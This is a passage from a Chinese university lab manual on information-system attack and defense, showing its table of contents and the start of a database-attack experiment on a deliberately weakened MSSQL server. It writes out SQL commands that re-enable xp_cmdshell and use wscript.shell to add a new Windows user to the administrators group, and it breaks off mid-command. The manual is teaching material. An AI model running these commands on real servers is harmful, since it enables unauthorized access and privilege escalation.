信息系统攻防与对抗综合实验指导书12.doc

信息系统攻防与对抗综合实验指导书12

信息工程学院实验指导书系列 目 录 前 言 2 目 录 3 实验一 针对数据库的攻击和防御 4 一、实验目的 4 二、实验内容 4 三、实验环境 4 四、实验过程 4 五、思考题 20 实验二 针对操作系统的攻击和防御 21 一、实验目的 21 二、实验内容 21 三、实验环境 21 四、实验过程 21 五、思考题 38 实验三 针对网络协议的攻击和防御 39 一、实验目的 39 二、实验内容 39 三、实验环境 39 四、实验过程 39 五、思考题 49 实验四 综合攻击和综合防御 50 一、实验目的 50 二、实验内容 50 三、实验环境 50 四、实验过程 50 五、思考题 51 附录 52 一、手工注入脚本命令 52 实验一 针对数据库的攻击和防御 一、实验目的 1. 认识对数据库的几种攻击方法: 弱口令攻击,溢出攻击和注入攻击。 2. 掌握数据库的安全设置方法。 二、实验内容 练习使用对数据库的几种攻击方法: 弱口令攻击,溢出攻击和注入攻击,了解这几种攻击方法攻击成功的环境要求,进而掌握数据库的安全设置方法,积极防御,保护数据的安全。 三、实验环境 1台安装Windows2000/XP/2003操作系统的计算机,磁盘格式配置为NTFS,搭建一个access+asp,mssql+asp,php+mysql的web实验环境 注 :(mssql没打sp4补丁)。一台mssql服务器,开放远程连接和sa密码为空。 四、实验过程 (一)针对数据库的攻击 1. 弱口令攻击(Sa空口令入侵Windows NT/2000 自动攻击探测机 SQLTools.exe。 原理:由于管理员的疏忽或者安全意识不强没有设置sa密码,并且可以远程连接,这时我们就利用sa权限(系统权限)进行入侵。 实验配置:一台mssql服务器,开放远程连接和sa密码为空。 利用windows NT/2000 自动攻击探测机常见情况恢复执行xp_cmdshell1)未能找到存储过程master..xpcmdshell. 恢复方法:查询连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =xplog70.dlldeclare @o int 第二步执行:sp_addextendedproc xp_cmdshell, xpsql70.dll 然后按F5键命令执行完毕2)无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)恢复方法:查询器连接后,第一步执行:sp_dropextendedproc xp_cmdshell第二步执行:sp_addextendedproc xp_cmdshell, xpsql70.dll然后按F5键命令执行完毕3)无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)恢复方法:查询分析器连接后,第一步执行:exec sp_dropextendedproc xp_cmdshell第二步执行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll然后按F5键命令执行完毕终极方法.如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:查询分析器连接后,2000servser系统:declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:\winnt\system32\cmd.exe /c net user 新用户 密码 /adddeclare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /addxp或2003server系统:declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:\windows\system32\cm

文档评论(0)

1亿VIP精品文档

相关文档